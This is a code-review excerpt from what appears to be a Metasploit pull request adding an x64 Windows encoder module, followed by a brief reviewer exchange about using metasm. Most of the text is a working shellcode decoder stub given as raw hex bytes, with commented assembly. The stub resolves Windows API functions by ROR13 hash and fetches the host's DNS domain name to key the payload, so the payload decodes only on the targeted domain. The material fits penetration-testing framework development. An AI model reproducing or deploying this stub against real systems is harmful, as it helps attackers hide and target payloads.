modules/encoders/x64/xor_context_win7_domainname.rb

```diff
@@ -0,0 +1,173 @@
+    #     add r14d, r13d ; R14D = Absolute base address for export table
+    #     mov r10d, [r14d + 0x18] ; Go into export table and get the numberOfNames
+    #     mov ebx, [r14d + 0x20] ; EBX = AddressOfNames offset
+    #     add ebx, r13d ; EBX = AddressOfNames base
+    # findFunctionLoop:
+    #     jecxz findFunctionFinished ; ECX == 0 means nothing found
+    #     dec r10d ; Decrease by one until match is found
+    #     mov esi, [ebx + r10d * 4] ; Get name
+    #     add esi, r13d ; ESI = Current name
+    # findHashes:
+    #     xor edi, edi
+    #     xor eax, eax
+    #     cld
+    # continueHashing:
+    #     lodsb ; Get into AL from ESI
+    #     test al, al ; Is the end of the string reached?
+    #     jz computeHashFinished
+    #     ror edi, 0xd ; ROR13 hash calculation
+    #     add edi, eax
+    #     jmp continueHashing
+    # computeHashFinished:
+    #     cmp edi, edx ; EDX has the function hash
+    #     jnz findFunctionLoop ; Didn't match, try harder!
+    #     mov ebx, [r14d + 0x24] ; Put the address of the ordinal table and put it in EBX
+    #     add ebx, r13d ; EBX = Absolute address
+    #     xor ecx, ecx ; ECX = 0
+    #     mov cx, [ebx + 2 * r10d] ; Each ordinal is two bytes
+    #     mov ebx, [r14d + 0x1c] ; Extract address table offset
+    #     add ebx, r13d ; EBX = Absolute address
+    #     mov eax, [ebx + 4 * ecx] ; EAX = Relative address
+    #     add eax, r13d
+    # findFunctionFinished:
+    #     ret
+    #
+    # ; All done, continue with your own code here.  Remember that the DomainNameDNS is referenced in RBX!
+    # done:
+
+    # TODO: Optimize
+    decoder = "" +
+        "\x65\x4C\x8B\x24\x25\x60\x00\x00\x00\x4D\x8B\x64\x24\x18\x4D\x8B\x64\x24\x20\x4D\x8B\x24\x24\x4D\x8B\x7C\x24\x20\x4D\x8B\x24\x24\x4D\x8B\x64\x24\x20\x4C\x89\xE1\xBA\x8E\x4E\x0E\xEC\xE8\xB1\x00\x00\x00\xEB\x76\x5B\x48\x89\xD9\xFF\xD0\x50\x4C\x89\xE1\xBA\xAA\xFC\x0D\x7C\xE8\x9B\x00\x00\x00\xEB\x72\x5B\x59\x48\x89\xDA\xFF\xD0\x48\x89\xC3\x48\x31\xC9\x48\x31\xD2\x48\xFF\xC2\x4C\x8D\x44\x24\x24\xFF\xD3\x48\x8B\x44\x24\x24\x48\x31\xDB\x8A\x58\x4E\x48\xC1\xE3\x08\x8A\x58\x4C\x48\xC1\xE3\x08\x8A\x58\x4A\x48\xC1\xE3\x08\x8A\x58\x48\x48\xC1\xE3\x08\x8A\x58\x46\x48\xC1\xE3\x08\x8A\x58\x44\x48\xC1\xE3\x08\x8A\x58\x42\x48\xC1\xE3\x08\x8A\x58\x40\xE9\xA2\x00\x00\x00\xE9\x9D\x00\x00\x00\xE8\x85\xFF\xFF\xFF\x6E\x65\x74\x61\x70\x69\x33\x32\x2E\x64\x6C\x6C\x00\xE8\x89\xFF\xFF\xFF\x44\x73\x52\x6F\x6C\x65\x47\x65\x74\x50\x72\x69\x6D\x61\x72\x79\x44\x6F\x6D\x61\x69\x6E\x49\x6E\x66\x6F\x72\x6D\x61\x74\x69\x6F\x6E\x00\x49\x89\xCD\x67\x41\x8B\x45\x3C\x67\x45\x8B\xB4\x05\x88\x00\x00\x00\x45\x01\xEE\x67\x45\x8B\x56\x18\x67\x41\x8B\x5E\x20\x44\x01\xEB\x67\xE3\x3F\x41\xFF\xCA\x67\x42\x8B\x34\x93\x44\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0\x74\x07\xC1\xCF\x0D\x01\xC7\xEB\xF4\x39\xD7\x75\xDD\x67\x41\x8B\x5E\x24\x44\x01\xEB\x31\xC9\x66\x67\x42\x8B\x0C\x53\x67\x41\x8B\x5E\x1C\x44\x01\xEB\x67\x8B\x04\x8B\x44\x01\xE8\xC3" +
+
```

Comment:
Is there a reason not to use metasm here?

Reply:
Both of your comments are spot on.  This is my first metasploit module,
and I didn’t know about metasm, that’s why I haven’t used it here.